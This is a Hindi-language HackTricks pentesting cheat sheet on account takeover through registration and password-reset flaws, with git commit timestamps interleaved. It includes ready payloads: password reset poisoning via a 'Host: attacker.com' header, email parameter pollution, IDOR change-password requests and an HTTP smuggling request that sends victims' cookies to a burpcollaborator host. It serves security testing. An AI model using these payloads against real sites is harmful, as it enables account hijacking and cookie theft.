hacktricks/pentesting-web/registration-vulnerabilities.md

203 lines
16 KiB
Markdown
Raw Normal View History

# पंजीकरण और अधिग्रहण संवेदनशीलताएँ
2022-04-28 16:01:33 +00:00
<details>
<summary><strong>AWS हैकिंग सीखें शून्य से नायक तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
2022-04-28 16:01:33 +00:00
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सदस्यता योजनाएँ**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) या **Twitter** पर मुझे 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) **का अनुसरण करें**.
* **अपनी हैकिंग तरकीबें साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके.
2022-04-28 16:01:33 +00:00
</details>
## पंजीकरण अधिग्रहण
2022-04-28 16:01:33 +00:00
2023-11-06 08:38:02 +00:00
### डुप्लिकेट पंजीकरण
2021-06-27 14:55:59 +00:00
2023-11-06 08:38:02 +00:00
* मौजूदा उपयोगकर्ता नाम का उपयोग करके उत्पन्न करने का प्रयास करें
* ईमेल में विविधता जांचें:
2023-11-06 08:38:02 +00:00
* अपरकेस
* \+1@
* ईमेल में कुछ जोड़ें
* ईमेल नाम में विशेष अक्षर (%00, %09, %20)
* ईमेल के बाद काले अक्षर डालें: `test@test.com a`
2023-11-06 08:38:02 +00:00
* victim@gmail.com@attacker.com
* victim@attacker.com@gmail.com
2021-06-27 14:55:59 +00:00
### उपयोगकर्ता नाम सूचीकरण
2021-06-27 14:55:59 +00:00
जांचें कि क्या आप पता लगा सकते हैं जब एक उपयोगकर्ता नाम पहले से ही एप्लिकेशन के अंदर पंजीकृत हो चुका है।
2021-06-27 14:55:59 +00:00
2023-11-06 08:38:02 +00:00
### पासवर्ड नीति
2021-06-27 14:55:59 +00:00
एक उपयोगकर्ता बनाते समय पासवर्ड नीति की जांच करें (जांचें कि क्या आप कमजोर पासवर्ड का उपयोग कर सकते हैं).\
उस स्थिति में आप प्रमाणीकरण को ब्रूटफोर्स करने का प्रयास कर सकते हैं।
2021-06-27 14:55:59 +00:00
### SQL इंजेक्शन
2021-06-27 14:55:59 +00:00
[**इस पृष्ठ की जांच करें**](sql-injection/#insert-statement) पंजीकरण फॉर्म में **SQL इंजेक्शन** के माध्यम से खाता अधिग्रहण या जानकारी निकालने का प्रयास करने के लिए।
2021-06-27 14:55:59 +00:00
### Oauth अधिग्रहण
2021-06-27 14:55:59 +00:00
2023-02-16 18:26:56 +00:00
{% content-ref url="oauth-to-account-takeover.md" %}
[oauth-to-account-takeover.md](oauth-to-account-takeover.md)
{% endcontent-ref %}
2021-06-27 14:55:59 +00:00
### SAML संवेदनशीलताएँ
2021-06-27 14:55:59 +00:00
{% content-ref url="saml-attacks/" %}
[saml-attacks](saml-attacks/)
{% endcontent-ref %}
2023-11-06 08:38:02 +00:00
### ईमेल बदलें
पंजीकृत होने पर ईमेल बदलने का प्रयास करें और जांचें कि क्या यह परिवर्तन सही ढंग से मान्य है या आप इसे मनमाने ईमेल में बदल सकते हैं।
### अधिक जांच
* जांचें कि क्या आप **डिस्पोजेबल ईमेल** का उपयोग कर सकते हैं
* **लंबा** **पासवर्ड** (>200) **DoS** का कारण बनता है
* **खाता निर्माण पर दर सीमा की जांच करें**
* username@**burp\_collab**.net का उपयोग करें और **कॉलबैक** का विश्लेषण करें
## **पासवर्ड रीसेट अधिग्रहण**
2021-06-27 14:55:59 +00:00
### पासवर्ड रीसेट टोकन रेफरर के माध्यम से लीक <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>
2021-11-30 00:17:48 +00:00
1. अपने ईमेल पते पर पासवर्ड रीसेट का अनुरोध करें
2. पासवर्ड रीसेट लिंक पर क्लिक करें
3. पासवर्ड बदलें नहीं
4. किसी भी तृतीय पक्ष वेबसाइटों पर क्लिक करें (उदाहरण: Facebook, twitter)
5. Burp Suite प्रॉक्सी में अनुरोध को इंटरसेप्ट करें
6. जांचें कि क्या रेफरर हेडर पासवर्ड रीसेट टोकन लीक कर रहा है।
### पासवर्ड रीसेट जहरीलापन <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>
1. Burp Suite में पासवर्ड रीसेट अनुरोध को इंटरसेप्ट करें
2. Burp Suite में निम्नलिखित हेडर्स को जोड़ें या संपादित करें: `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
3. संशोधित हेडर के साथ अनुरोध को आगे बढ़ाएं\
`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
4. _host header_ के आधार पर पासवर्ड रीसेट URL की तलाश करें जैसे: `https://attacker.com/reset-password.php?token=TOKEN`
### ईमेल पैरामीटर के माध्यम से पासवर्ड रीसेट <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
2021-11-30 00:17:48 +00:00
```powershell
# parameter pollution
email=victim@mail.com&email=hacker@mail.com
# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}
# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com
# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com
```
### API पैरामीटर्स पर IDOR <a href="#idor-on-api-parameters" id="idor-on-api-parameters"></a>
2021-11-30 00:17:48 +00:00
1. हमलावर को अपने खाते से लॉगिन करना होगा और **पासवर्ड बदलें** सुविधा पर जाना होगा।
2. Burp Suite शुरू करें और अनुरोध को इंटरसेप्ट करें।
3. इसे रिपीटर टैब पर भेजें और पैरामीटर्स को संपादित करें: उपयोगकर्ता ID/ईमेल\
2023-11-06 08:38:02 +00:00
`powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})`
2021-11-30 00:17:48 +00:00
2023-11-06 08:38:02 +00:00
### कमजोर पासवर्ड रीसेट टोकन <a href="#weak-password-reset-token" id="weak-password-reset-token"></a>
2021-11-30 00:17:48 +00:00
पासवर्ड रीसेट टोकन को यादृच्छिक रूप से उत्पन्न किया जाना चाहिए और हर बार अद्वितीय होना चाहिए।\
यह निर्धारित करने का प्रयास करें कि टोकन समाप्त होता है या यह हमेशा समान रहता है, कुछ मामलों में उत्पादन एल्गोरिदम कमजोर होता है और अनुमान लगाया जा सकता है। निम्नलिखित चर एल्गोरिदम द्वारा उपयोग किए जा सकते हैं।
2021-11-30 00:17:48 +00:00
* Timestamp
* UserID
2023-11-06 08:38:02 +00:00
* उपयोगकर्ता का ईमेल
* प्रथम नाम और उपनाम
* जन्म तिथि
* Cryptography
2023-11-06 08:38:02 +00:00
* केवल संख्या
* छोटा टोकन अनुक्रम (वर्ण \[A-Z,a-z,0-9] के बीच)
* टोकन पुन: उपयोग
2023-11-06 08:38:02 +00:00
* टोकन समाप्ति तिथि
2021-11-30 00:17:48 +00:00
### पासवर्ड रीसेट टोकन का लीक होना <a href="#leaking-password-reset-token" id="leaking-password-reset-token"></a>
2021-11-30 00:17:48 +00:00
1. एक विशिष्ट ईमेल के लिए API/UI का उपयोग करके पासवर्ड रीसेट अनुरोध ट्रिगर करें, उदाहरण: test@mail.com
2. सर्वर प्रतिक्रिया की जांच करें और `resetToken` के लिए देखें।
3. फिर टोकन को एक URL में उपयोग करें जैसे `https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]`
2021-11-30 00:17:48 +00:00
2023-11-06 08:38:02 +00:00
### उपयोगकर्ता नाम संघर्ष के माध्यम से पासवर्ड रीसेट <a href="#password-reset-via-username-collision" id="password-reset-via-username-collision"></a>
2021-11-30 00:17:48 +00:00
1. पीड़ित के उपयोगकर्ता नाम के समान एक उपयोगकर्ता नाम के साथ सिस्टम पर रजिस्टर करें, लेकिन उपयोगकर्ता नाम से पहले और/या बाद में सफेद स्थान डालें। उदाहरण: `"admin "`
2. अपने दुर्भावनापूर्ण उपयोगकर्ता नाम के साथ पासवर्ड रीसेट का अनुरोध करें।
3. अपने ईमेल पर भेजे गए टोकन का उपयोग करें और पीड़ित का पासवर्ड रीसेट करें।
4. नए पासवर्ड के साथ पीड़ित खाते में कनेक्ट करें।
2021-11-30 00:17:48 +00:00
CTFd प्लेटफॉर्म इस हमले के लिए संवेदनशील था।\
2023-11-06 08:38:02 +00:00
देखें: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
2021-11-30 00:17:48 +00:00
### क्रॉस साइट स्क्रिप्टिंग के माध्यम से खाता अधिग्रहण <a href="#account-takeover-via-cross-site-scripting" id="account-takeover-via-cross-site-scripting"></a>
2021-11-30 00:17:48 +00:00
1. एप्लिकेशन के अंदर या एक सबडोमेन में XSS खोजें अगर कुकीज़ मूल डोमेन के लिए स्कोप की गई हैं: `*.domain.com`
2. वर्तमान **सत्र कुकी** का लीक करें।
3. कुकी का उपयोग करके उपयोगकर्ता के रूप में प्रमाणित करें।
2021-11-30 00:17:48 +00:00
### HTTP अनुरोध स्मगलिंग के माध्यम से खाता अधिग्रहण <a href="#account-takeover-via-http-request-smuggling" id="account-takeover-via-http-request-smuggling"></a>
2021-11-30 00:17:48 +00:00
1\. **smuggler** का उपयोग करके HTTP अनुरोध स्मगलिंग के प्रकार का पता लगाएं (CL, TE, CL.TE)\
2021-11-30 00:17:48 +00:00
`powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h`\
2\. एक अनुरोध तैयार करें जो `POST / HTTP/1.1` को निम्नलिखित डेटा के साथ ओवरराइट करेगा:\
`GET http://something.burpcollaborator.net HTTP/1.1 X:` लक्ष्य के साथ पीड़ितों को burpcollab पर रीडायरेक्ट करने और उनके कुकीज़ चुराने के लिए\
2023-11-06 08:38:02 +00:00
3\. अंतिम अनुरोध निम्नलिखित की तरह दिख सकता है
2021-11-30 00:17:48 +00:00
```
GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0
GET http://something.burpcollaborator.net HTTP/1.1
X: X
```
Hackerone रिपोर्ट्स इस बग का शोषण करती हैं:
* [https://hackerone.com/reports/737140](https://hackerone.com/reports/737140)
* [https://hackerone.com/reports/771666](https://hackerone.com/reports/771666)
2021-11-30 00:17:48 +00:00
### CSRF के माध्यम से खाता अपहरण <a href="#account-takeover-via-csrf" id="account-takeover-via-csrf"></a>
2021-11-30 00:17:48 +00:00
1. CSRF के लिए पेलोड बनाएं, उदाहरण: “पासवर्ड बदलने के लिए स्वत: सबमिट होने वाला HTML फॉर्म”
2023-11-06 08:38:02 +00:00
2. पेलोड भेजें
2021-11-30 00:17:48 +00:00
### JWT के माध्यम से खाता अपहरण <a href="#account-takeover-via-jwt" id="account-takeover-via-jwt"></a>
2021-11-30 00:17:48 +00:00
JSON Web Token का उपयोग एक उपयोगकर्ता को प्रमाणित करने के लिए किया जा सकता है।
2021-11-30 00:17:48 +00:00
* दूसरे उपयोगकर्ता ID / ईमेल के साथ JWT संपादित करें
2023-11-06 08:38:02 +00:00
* कमजोर JWT हस्ताक्षर की जांच करें
2021-11-30 00:17:48 +00:00
{% content-ref url="hacking-jwt-json-web-tokens.md" %}
[hacking-jwt-json-web-tokens.md](hacking-jwt-json-web-tokens.md)
{% endcontent-ref %}
2023-11-06 08:38:02 +00:00
## संदर्भ
2021-11-30 00:17:48 +00:00
* [https://salmonsec.com/cheatsheet/account\_takeover](https://salmonsec.com/cheatsheet/account\_takeover)
2022-04-28 16:01:33 +00:00
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert) के साथ शून्य से नायक तक AWS हैकिंग सीखें</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
2022-04-28 16:01:33 +00:00
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।
2022-04-28 16:01:33 +00:00
</details>